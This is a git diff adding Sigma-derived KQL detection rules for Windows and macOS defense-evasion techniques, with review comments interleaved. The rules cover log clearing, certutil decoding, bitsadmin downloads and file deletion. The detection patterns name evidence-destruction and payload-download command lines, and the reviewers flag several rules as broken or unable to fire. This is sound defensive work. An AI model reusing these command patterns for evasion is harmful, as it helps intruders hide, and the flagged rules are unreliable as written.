+// Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql b/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql
new file mode 100644
index 00000000..492a3cc1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql
@@ -0,0 +1,10 @@
+// Title: EventLog EVTX File Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceFileEvents
+| where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql
new file mode 100644
index 00000000..5dbd1388
--- /dev/null
+++ b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql
@@ -0,0 +1,16 @@
+// Title: EVTX Created In Uncommon Location
+// Author: D3F7A5105
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
+This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
+Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+// - Administrator or backup activity
+// - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files
+
+DeviceFileEvents
+| where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql b/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql
new file mode 100644
index 00000000..2747b280
--- /dev/null
+++ b/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql
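Review bot: The first exclusion arm, `FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\"`, can never be true together with the outer `FolderPath endswith ".evtx"`, so the container base-image exclusion is dead and every EVTX write under those `winevt\Logs\` folders raises an alert. The inner path test should be `FolderPath contains "\\Windows\\System32\\winevt\\Logs\\"`, which is presumably what the Sigma source expresses; only that one operator needs to change. The second arm, `startswith "C:\\Windows\\System32\\winevt\\Logs\\"`, is fine as written.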
@@ -0,0 +1,12 @@
+// Title: Exchange PowerShell Cmdlet History Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-26
+// Level: high
+// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - Possible FP during log rotation
+
+DeviceFileEvents
+| where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql b/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql
new file mode 100644
index 00000000..c56afa86
--- /dev/null
+++ b/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql
@@ -0,0 +1,12 @@
+// Title: Execute Files with Msdeploy.exe
+// Author: Beyu Denis, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects file execution using the msdeploy.exe lolbin
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - System administrator Usage
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql b/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql
new file mode 100644
index 00000000..762f9ccb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql
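Review bot: `FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"` requires the path to begin with a backslash, but the other DeviceFileEvents rules in this commit anchor FolderPath as an absolute path (`startswith "C:\\Windows\\System32\\winevt\\Logs\\"`), so this rule cannot fire; the Exchange logging tree is nested under the product's install directory, not at the root. It should be `| where FolderPath contains "_Cmdlet_" and FolderPath contains "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"`. The `startswith` presumably comes from a Sigma `contains` or a path-prefix modifier that the converter mapped to an absolute anchor; worth checking the converter for other relative-path `startswith` outputs.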
@@ -0,0 +1,10 @@
+// Title: Execute From Alternate Data Streams
+// Author: frack113
+// Date: 2021-09-01
+// Level: medium
+// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql b/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql
new file mode 100644
index 00000000..39609343
--- /dev/null
+++ b/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql
@@ -0,0 +1,12 @@
+// Title: Execute Pcwrun.EXE To Leverage Follina
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-13
+// Level: high
+// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql b/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql
new file mode 100644
index 00000000..1919c3e5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql
@@ -0,0 +1,10 @@
+// Title: Execution DLL of Choice Using WAB.EXE
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-13
+// Level: high
+// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql b/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql
new file mode 100644
index 00000000..7da04081
--- /dev/null
+++ b/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql
@@ -0,0 +1,10 @@
+// Title: Execution Of Non-Existing File
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2021-12-09
+// Level: high
+// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath))))
\ No newline at end of file
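Review bot: `RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath"` folds the value name into the key path; in DeviceRegistryEvents the key is in RegistryKey and the value name in RegistryValueName, so this condition never matches and the rule is silent. Change it to `RegistryKey endswith "\\Software\\Microsoft\\WAB" and RegistryValueName =~ "DLLPath"` and keep the `not(RegistryValueData =~ ...)` check as is. Consider also restricting to `ActionType == "RegistryValueSet"`, since a value-deletion event carries no data and would otherwise satisfy the negated comparison.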
diff --git a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
new file mode 100644
index 00000000..2a81c7e2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
@@ -0,0 +1,12 @@ +// Title: Execution of Suspicious File Type Extension +// Author: Max Altgelt (Nextron Systems) +// Date: 2021-12-09 +// Level: medium +// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. +This rule might require some initial baselining to align with some third party tooling in the user environment. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains 
"\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql b/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql
new file mode 100644
index 00000000..a2492d3d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql
@@ -0,0 +1,12 @@
+// Title: Execution via stordiag.exe
+// Author: Austin Songer (@austinsonger)
+// Date: 2021-10-21
+// Level: high
+// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of stordiag.exe.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql b/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql
new file mode 100644
index 00000000..cd379a4a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql
@@ -0,0 +1,12 @@
+// Title: Execution via WorkFolders.exe
+// Author: Maxime Thiebaut (@0xThiebaut)
+// Date: 2021-10-21
+// Level: high
+// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of the uncommon Windows Work Folders feature.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe"))
\ No newline at end of file
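Review bot: The second description line of the suspicious-file-type rule, `This rule might require some initial baselining…`, is emitted without the `//` prefix, so as rendered here the file contains a bare prose line before `DeviceProcessEvents` and will not parse as KQL; each line of a multi-line Sigma description should be written as `// …`. The same pattern appears in several other multi-line descriptions in this patch, so the fix belongs in the conversion script rather than in this one file. The hunk's `| where` line begins on the previous source line.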
diff --git a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql new file mode 100644 index 00000000..fb82928c --- /dev/null +++ b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql @@ -0,0 +1,12 @@ +// Title: Explorer Process Tree Break +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber +// Date: 2019-06-29 +// Level: medium +// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, +which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and (ProcessCommandLine contains " -root," or ProcessCommandLine contains " /root," or ProcessCommandLine contains " –root," or ProcessCommandLine contains " —root," or ProcessCommandLine contains " ―root,")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql new file mode 100644 index 00000000..553e9771 --- /dev/null +++ b/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql 
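Review bot: The description continuation `which is similar to cmd.exe /c, only it breaks the process tree…` is emitted without the `//` prefix, so as rendered here it is a bare prose line ahead of the query and the .kql will not parse; write it as `// which is similar to cmd.exe /c, …`. This looks like a converter bug affecting every multi-line Sigma description, so fix the prefixing there rather than hand-editing the generated file.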
@@ -0,0 +1,10 @@
+// Title: File Decoded From Base64/Hex Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-decode " or ProcessCommandLine contains "/decode " or ProcessCommandLine contains "–decode " or ProcessCommandLine contains "—decode " or ProcessCommandLine contains "―decode " or ProcessCommandLine contains "-decodehex " or ProcessCommandLine contains "/decodehex " or ProcessCommandLine contains "–decodehex " or ProcessCommandLine contains "—decodehex " or ProcessCommandLine contains "―decodehex ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql b/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql
new file mode 100644
index 00000000..93d5dc05
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql
@@ -0,0 +1,12 @@
+// Title: File Deleted Via Sysinternals SDelete
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Legitimate usage
+
+DeviceFileEvents
+| where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_deletion.kql b/KQL/rules/Defense Evasion/file_deletion.kql
new file mode 100644
index 00000000..e0470dc3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_deletion.kql
@@ -0,0 +1,12 @@
+// Title: File Deletion
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-07
+// Level: informational
+// Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_deletion_via_del.kql b/KQL/rules/Defense Evasion/file_deletion_via_del.kql
new file mode 100644
index 00000000..6509fdd5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_deletion_via_del.kql
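Review bot: The SDelete rule's description says it keys on the rename pattern SDelete uses, but the `| where` clause has no action filter, so any creation, modification or deletion of a `.AAA`/`.ZZZ` file in DeviceFileEvents will match; add `and ActionType == "FileRenamed"` and consider requiring `isnotempty(PreviousFileName)` so only genuine renames are reported. The lowercase `.aaa` Wireshark exclusion works as written because KQL `endswith` is case-insensitive, which is worth a `//` note since the Sigma source likely spelled it that way deliberately.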
@@ -0,0 +1,16 @@ +// Title: File Deletion Via Del +// Author: frack113 +// Date: 2022-01-15 +// Level: low +// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. +Adversaries may delete files left behind by the actions of their intrusion activity. +Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " –f" or ProcessCommandLine contains " —f" or ProcessCommandLine contains " ―f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q" or ProcessCommandLine contains " –q" or ProcessCommandLine contains " —q" or ProcessCommandLine contains " ―q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql new file mode 100644 index 00000000..72b3577d --- /dev/null +++ b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql 
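Review bot: The three continuation lines of the description (`Adversaries may delete…`, `Malware, tools…`, `Removal of these files…`) are emitted without the `//` prefix, so as rendered here they sit as bare prose before `DeviceProcessEvents` and the file will not parse; each should begin with `// `. Separately, `ProcessCommandLine contains "del "` and `"erase "` also match those substrings inside unrelated arguments (for example a path containing `model `), which is consistent with the `low` level but worth stating in the False Positives line.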
@@ -0,0 +1,11 @@
+// Title: File Download Using ProtocolHandler.exe
+// Author: frack113
+// Date: 2021-07-13
+// Level: medium
+// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql
new file mode 100644
index 00000000..60f2f41e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql
@@ -0,0 +1,12 @@
+// Title: File Download Via Bitsadmin
+// Author: Michael Haag, FPT.EagleEye
+// Date: 2017-03-09
+// Level: medium
+// Description: Detects usage of bitsadmin downloading a file
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+// False Positives:
+// - Some legitimate apps use this, but limited.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
new file mode 100644
index 00000000..6d1a44f6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Bitsadmin To A Suspicious Target Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
new file mode 100644
index 00000000..4892bb28
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Bitsadmin To An Uncommon Target Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: medium
+// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
new file mode 100644
index 00000000..6bbcad20
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
@@ -0,0 +1,11 @@
+// Title: File Download Via InstallUtil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql b/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql
new file mode 100644
index 00000000..97cd556e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql
@@ -0,0 +1,12 @@
+// Title: File Download Via Nscurl - MacOS
+// Author: Daniel Cortez
+// Date: 2024-06-04
+// Level: medium
+// Description: Detects the execution of the nscurl utility in order to download files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate usage of nscurl by administrators and users.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--download " or ProcessCommandLine contains "--download-directory " or ProcessCommandLine contains "--output " or ProcessCommandLine contains "-dir " or ProcessCommandLine contains "-dl " or ProcessCommandLine contains "-ld" or ProcessCommandLine contains "-o ") and FolderPath endswith "/nscurl"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql b/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql
new file mode 100644
index 00000000..06cccb70
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Windows Defender MpCmpRun.EXE
+// Author: Matthew Matchen
+// Date: 2020-09-04
+// Level: high
+// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql b/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql
new file mode 100644
index 00000000..4b5e1ef3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql
@@ -0,0 +1,10 @@
+// Title: File Download with Headless Browser
+// Author: Sreeman, Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003
+
+DeviceProcessEvents
